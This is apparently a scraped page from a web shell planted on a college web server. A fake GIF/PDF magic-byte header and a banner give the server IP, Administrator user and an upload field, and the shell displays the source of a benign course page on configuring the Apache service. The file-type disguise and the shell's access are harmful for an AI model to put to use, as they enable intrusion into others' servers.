GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.160 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /nginx/html/JimMartinson/_Archive/MMDT1021/apache/ |
Upload File : |
<? // ApacheInstall.php $TRACK = "<b>".basename(__FILE__).'</b> <span class="pv_fl">('.__FILE__.")</span>\n<ol>\n"; ini_set('include_path',ini_get('include_path').PATH_SEPARATOR.$_SERVER['DOCUMENT_ROOT']."/"); // Add the DOCUMENT_ROOT to the include_path. $thisFile=__FILE__; $thisLine=__LINE__; include('application.phpinc'); $thisFile=__FILE__; $thisLine=__LINE__; include('Course/courseInfo.phpinc'); $title = "Apache Service"; $headTitle = '_CST_ - '.$courseNumber.' '.$courseTitle.' - '.$title; $pageTitle = $courseNumber.' '.$courseTitle.'<br>'.$title; $pageMenu = 'Course/courseMenu.phpinc'; $thisFile = __FILE__; $thisLine=__LINE__; include('common/pageHeader.phpinc'); $thisFile=__FILE__; $thisLine=__LINE__; include('Login/authenticate.phpinc'); $sectionTitle = $courseNumber.' '.$courseTitle.' - '.$title; $thisFile = __FILE__; $thisLine=__LINE__; include('common/sectionHeader.phpinc'); ?> Apache menu: <a href="ApacheInstall.php">Part 1: Apache Install</a> <span class="currentpage">Part 2: Configure the Apache Service </span> <a href="ApacheControl.php">Part 3: Setup Apache Control</a> <a href="ApacheConfigure.php">Part 4: Configure Apache</a> <br /><br /> Configure the Apache Service: (part 2 of 4) <br />You don't want Apache running all the time - it takes up memory and CPU cycles. We are going to set it up so you can start and stop it when you want. <ol class="instruction"> <li>Open the Control Panel (<img src="start.gif" alt="start" style="vertical-align:bottom;" /> <b><u>S</u>ettings <u>C</u>ontrol Panel</b>). <br />If you have not already changed the view to Classic, click on the <b>Switch to Classic View</b> link. <br /><img src="cp_01.jpg" /> </li> <li>Double-click on <b>Administrative Tools</b>.<br /><img src="cp_02.jpg" /></li> <li>Double-click on <b>Services</b>.<br /><img src="cp_03.jpg" /></li> <li>Double-click on <b>Apache2</b>.<br /><img src="cp_04.jpg" /></li> <li>Change the <b>Startup type</b> to <b>Manual</b>.<br /><img src="cp_05.jpg" /></li> <li>Click Apply. <br /><img src="cp_06.jpg" /></li> <li>Click OK.<br /><img src="cp_07.jpg" /> <br />You can close the <b>Services</b> and <b>Administrative Tools</b> windows. We are done with them. </li> </ol> That's it for configuring the Apache Service. Now you need to <a href="ApacheControl.php">Setup Apache Control</a>. <? $thisFile = __FILE__; $thisLine=__LINE__; include('common/sectionFooter.phpinc'); $thisFile = __FILE__; $thisLine=__LINE__; include('common/pageFooter.phpinc'); ?>